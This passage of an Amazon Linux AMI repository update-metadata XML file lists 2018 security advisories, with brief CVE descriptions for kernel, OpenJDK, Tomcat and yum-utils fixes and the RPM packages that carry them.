name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1049</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1049: critical priority package update for kernel</title><issued date="2018-08-04 23:48:00" /><updated date="2024-05-23 21:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5390:
A flaw named SegmentSmack was found in the way the Linux kernel handled specially crafted TCP packets. A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses.
CVE-2018-13405:
A vulnerability was found in the fs/inode.c:inode_init_owner() function logic of the LInux kernel that allows local users to create files with an unintended group ownership and with group execution and SGID permission bits set, in a scenario where a directory is SGID and belongs to a certain group and is writable by a user who is not a member of this group. This can lead to excessive permissions granted in case when they should not.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13405" title="" id="CVE-2018-13405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5390" title="" id="CVE-2018-5390" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1054</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1054: medium priority package update for java-1.8.0-openjdk</title><issued date="2018-08-09 16:07:00" /><updated date="2018-08-09 21:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2952:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171; JRockit: R28.3.18. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1600925:
CVE-2018-2952 OpenJDK: insufficient index validation in PatternSyntaxException getMessage() (Concurrency, 8199547)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2952" title="" id="CVE-2018-2952" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-src" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.181-8.b13.39.39.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.181-8.b13.39.39.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.181-8.b13.39.39.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.181" release="8.b13.39.39.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.181-8.b13.39.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1055</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1055: important priority package update for tomcat7 tomcat80</title><issued date="2018-08-09 16:10:00" /><updated date="2018-08-09 21:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8034:
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.
1607580:
CVE-2018-8034 tomcat: host name verification missing in WebSocket client
CVE-2018-8014:
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable &#039;supportsCredentials&#039; for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.
1579611:
CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins
CVE-2018-1336:
An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.
1607591:
CVE-2018-1336 tomcat: A bug in the UTF-8 decoder can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1336" title="" id="CVE-2018-1336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014" title="" id="CVE-2018-8014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8034" title="" id="CVE-2018-8034" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat80-lib" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-servlet-3.1-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.53" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.53-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.90-1.33.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.90" release="1.33.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.90-1.33.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1056</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1056: important priority package update for tomcat8</title><issued date="2018-08-09 16:12:00" /><updated date="2018-08-09 21:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8037:
A bug in the tracking of connection closures can lead to reuse of user sessions in a new connection. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.
1607582:
CVE-2018-8037 tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up
CVE-2018-8034:
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.
1607580:
CVE-2018-8034 tomcat: host name verification missing in WebSocket client
CVE-2018-8014:
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable &#039;supportsCredentials&#039; for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.
1579611:
CVE-2018-8014 tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins
CVE-2018-1336:
An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.
1607591:
CVE-2018-1336 tomcat: A bug in the UTF-8 decoder can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1336" title="" id="CVE-2018-1336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014" title="" id="CVE-2018-8014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8034" title="" id="CVE-2018-8034" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8037" title="" id="CVE-2018-8037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.32-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.32" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.32-1.78.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1057</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1057: important priority package update for yum-utils</title><issued date="2018-08-09 16:13:00" /><updated date="2018-08-09 21:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10897:
A directory traversal issue was found in reposync, a part of yum-utils, where reposync fails to sanitize paths in remote repository configuration files. If an attacker controls a repository, they may be able to copy files outside of the destination directory on the targeted system via path traversal. If reposync is running with heightened privileges on a targeted system, this flaw could potentially result in system compromise via the overwriting of critical system files.
1600221:
CVE-2018-10897 yum-utils: reposync: improper path validation may lead to directory traversal
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10897" title="" id="CVE-2018-10897" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yum-updateonboot" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-updateonboot-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-ps" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-ps-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-rpm-warm-cache" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-rpm-warm-cache-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-tmprepo" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-tmprepo-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-ovl" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-ovl-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-fastestmirror" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-fastestmirror-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-auto-update-debug-info" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-auto-update-debug-info-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-filter-data" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-filter-data-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-versionlock" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-versionlock-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-remove-with-leaves" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-remove-with-leaves-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-pre-transaction-actions" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-pre-transaction-actions-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-show-leaves" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-show-leaves-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-tsflags" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-tsflags-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-utils" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-utils-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-local" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-local-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-upgrade-helper" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-upgrade-helper-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-refresh-updatesd" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-refresh-updatesd-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-changelog" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-changelog-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-protectbase" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-protectbase-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-copr" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-copr-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-aliases" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-aliases-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-merge-conf" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-merge-conf-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-keys" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-keys-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-post-transaction-actions" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-post-transaction-actions-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-priorities" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-priorities-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-verify" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-verify-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-puppetverify" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-puppetverify-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-list-data" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-list-data-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-NetworkManager-dispatcher" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-NetworkManager-dispatcher-1.1.31-46.30.amzn1.noarch.rpm</filename></package><package name="yum-plugin-fs-snapshot" version="1.1.31" release="46.30.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-plugin-fs-snapshot-1.1.31-46.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1058</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1058: critical priority package update for kernel</title><issued date="2018-08-10 20:26:00" /><updated date="2018-08-14 17:53:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5391:
CVE-2018-3646:
CVE-2018-3620:
CVE-2018-3615:
